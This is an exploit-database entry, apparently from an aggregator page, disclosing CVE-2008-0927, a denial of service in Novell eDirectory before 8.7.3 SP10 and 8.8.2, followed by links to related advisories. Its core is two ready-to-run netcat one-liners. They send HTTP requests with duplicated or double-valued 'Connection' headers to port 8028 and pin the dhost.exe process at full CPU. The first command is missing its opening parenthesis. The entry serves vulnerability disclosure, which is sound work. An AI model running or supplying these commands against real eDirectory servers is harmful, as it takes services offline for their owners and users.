Lucene search
NicobEDB-ID:5547HistoryMay 05, 2008 - 12:00 a.m.
Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service
2008-05-0500:00:00
Nicob
www.exploit-db.com
20
[=] Affected software :
Editor : Novell
Name : eDirectory
Version : < 8.7.3 SP 10 and < 8.8.2
Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)
[=] External references :
http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Nicob
# milw0rm.com [2008-05-05]Related
packetstorm
packetstorm
novelledir-dos.txt
2008-05-06 00:00:00
seebug
seebug
Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability
2008-05-10 00:00:00
Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers DoS Vulnerability
2014-07-01 00:00:00
Novell eDirectory HTTP Connection倴ζη»ζε‘ζΌζ΄
2008-04-15 00:00:00
exploitpack
exploitpack
Novell eDirectory 8.7.3 SP 10 8.8.2 - HTTP headers Denial of Service
2008-05-05 00:00:00
checkpoint_advisories
checkpoint_advisories
Novell eDirectory HTTP Headers Denial of Service (CVE-2008-0927)
2008-05-20 00:00:00
securityvulns
securityvulns
Novell eDirectory DoS via HTTP headers
2008-05-06 00:00:00
nessus
nessus
cve
cve
CVE-2008-0927
2008-04-14 16:05:00
prion
prion
Code injection
2008-04-14 16:05:00
cvelist
cvelist
CVE-2008-0927
2008-04-14 16:00:00